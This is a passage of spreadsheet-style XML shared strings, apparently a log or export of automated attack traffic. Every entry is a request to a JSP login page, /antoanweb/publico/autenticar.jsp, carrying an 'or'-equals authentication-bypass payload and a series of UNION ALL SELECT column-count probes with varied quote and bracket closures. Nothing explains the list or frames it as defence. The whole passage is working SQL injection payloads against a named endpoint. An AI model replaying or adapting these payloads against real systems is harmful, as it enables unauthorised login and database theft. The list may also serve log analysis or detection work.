    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null#and((("dbpp"="dbpp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null#and((("aozx"="aozx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null#and((("phyb"="phyb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null#and((("jszw"="jszw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null#and((("grzt"="grzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null#and((("nfaz"="nfaz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null#and((("nkjh"="nkjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null#and((("ekop"="ekop</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull#and"iivx"="iivx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null#and"ckfi"="ckfi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null#and"ghmm"="ghmm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null#and"kqtr"="kqtr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null#and"ylhj"="ylhj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null#and"rmrd"="rmrd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null#and"yjkc"="yjkc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null#and"vhcm"="vhcm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null#and"htik"="htik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null#and"jcgy"="jcgy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull#and("isit"like"isit</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null#and("ibyc"like"ibyc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null#and("ffwf"like"ffwf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null#and("klhk"like"klhk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null#and("wdos"like"wdos</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null#and("gdkz"like"gdkz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null#and("dajr"like"dajr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null#and("gfgy"like"gfgy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null#and("uzoc"like"uzoc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null#and("lpey"like"lpey</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull#and(("pzwp"like"pzwp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null#and(("jmkb"like"jmkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null#and(("dbwg"like"dbwg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null#and(("fayq"like"fayq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null#and(("mmcj"like"mmcj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null#and(("ucaw"like"ucaw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null#and(("vgbc"like"vgbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null#and(("gfka"like"gfka</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null#and(("wxmk"like"wxmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null#and(("satd"like"satd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull#and((("trdt"like"trdt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null#and((("manh"like"manh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null#and((("ireu"like"ireu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null#and((("cqxt"like"cqxt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null#and((("hexo"like"hexo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null#and((("zyzv"like"zyzv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null#and((("agne"like"agne</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null#and((("pjvn"like"pjvn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null#and((("emfb"like"emfb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null#and((("cwlt"like"cwlt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull#and"yzzt"like"yzzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null#and"vyaf"like"vyaf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null#and"jvls"like"jvls</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null#and"hsja"like"hsja</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null#and"mesf"like"mesf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null#and"bqmv"like"bqmv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null#and"gtin"like"gtin</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null#and"xuvs"like"xuvs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null#and"jjmt"like"jjmt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null#and"kpud"like"kpud</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3234#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5288,5288#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5971,5971,5971#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9439,9439,9439,9439#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7033,7033,7033,7033,7033#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9827,9827,9827,9827,9827,9827#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6942,6942,6942,6942,6942,6942,6942#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4063,4063,4063,4063,4063,4063,4063,4063#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4434,4434,4434,4434,4434,4434,4434,4434,4434#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7194,7194,7194,7194,7194,7194,7194,7194,7194,7194#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1234#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3951,3951#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4379,4379,4379#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6589,6589,6589,6589#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6184,6184,6184,6184,6184#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4581,4581,4581,4581,4581,4581#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5514,5514,5514,5514,5514,5514,5514#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8672,8672,8672,8672,8672,8672,8672,8672#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8379,8379,8379,8379,8379,8379,8379,8379,8379#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5235,5235,5235,5235,5235,5235,5235,5235,5235,5235#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6296#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9928,9928#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5680,5680,5680#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9322,9322,9322,9322#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8159,8159,8159,8159,8159#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5626,5626,5626,5626,5626,5626#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2895,2895,2895,2895,2895,2895,2895#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4413,4413,4413,4413,4413,4413,4413,4413#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7082,7082,7082,7082,7082,7082,7082,7082,7082#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5723,5723,5723,5723,5723,5723,5723,5723,5723,5723#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect332#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect971,971#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3686,3686,3686#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2996,2996,2996,2996#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4338,4338,4338,4338,4338#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9794,9794,9794,9794,9794,9794#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2601,2601,2601,2601,2601,2601,2601#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1361,1361,1361,1361,1361,1361,1361,1361#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8445,8445,8445,8445,8445,8445,8445,8445,8445#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2885,2885,2885,2885,2885,2885,2885,2885,2885,2885#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5090#and(7721=7721</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3529,3529#and(2103=2103</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5273,5273,5273#and(4090=4090</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9102,9102,9102,9102#and(6825=6825</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9025,9025,9025,9025,9025#and(7524=7524</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7404,7404,7404,7404,7404,7404#and(7706=7706</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9364,9364,9364,9364,9364,9364,9364#and(5668=5668</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6341,6341,6341,6341,6341,6341,6341,6341#and(9258=9258</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6152,6152,6152,6152,6152,6152,6152,6152,6152#and(3309=3309</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8374,8374,8374,8374,8374,8374,8374,8374,8374,8374#and(7289=7289</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1062#and((5147=5147</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1481,1481#and((5204=5204</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5656,5656,5656#and((1973=1973</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7584,7584,7584,7584#and((4684=4684</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4182,4182,4182,4182,4182#and((901=901</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8546,8546,8546,8546,8546,8546#and((9452=9452</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5290,5290,5290,5290,5290,5290,5290#and((597=597</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect391,391,391,391,391,391,391,391#and((8192=8192</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5062,5062,5062,5062,5062,5062,5062,5062,5062#and((3953=3953</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7934,7934,7934,7934,7934,7934,7934,7934,7934,7934#and((9857=9857</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6483#and(((5780=5780</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1025,1025#and(((4127=4127</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect440,440,440#and(((9900=9900</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9144,9144,9144,9144#and(((1092=1092</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect521,521,521,521,521#and(((8762=8762</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5483,5483,5483,5483,5483,5483#and(((5039=5039</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect4500,4500,4500,4500,4500,4500,4500#and(((9088=9088</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect637,637,637,637,637,637,637,637#and(((5815=5815</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7921,7921,7921,7921,7921,7921,7921,7921,7921#and(((2177=2177</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6486,6486,6486,6486,6486,6486,6486,6486,6486,6486#and(((9632=9632</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2677#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2928,2928#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9569,9569,9569#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5790,5790,5790,5790#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3278,3278,3278,3278,3278#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2339,2339,2339,2339,2339,2339#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4756,4756,4756,4756,4756,4756,4756#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6691,6691,6691,6691,6691,6691,6691,6691#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9460,9460,9460,9460,9460,9460,9460,9460,9460#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9614,9614,9614,9614,9614,9614,9614,9614,9614,9614#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8274#and('ycth'='ycth</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect438,438#and('vftf'='vftf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6984,6984,6984#and('mlqh'='mlqh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7091,7091,7091,7091#and('cruj'='cruj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5311,5311,5311,5311,5311#and('sadb'='sadb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3763,3763,3763,3763,3763,3763#and('xpuj'='xpuj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9893,9893,9893,9893,9893,9893,9893#and('rgyo'='rgyo</t>
  </si>
  <si>
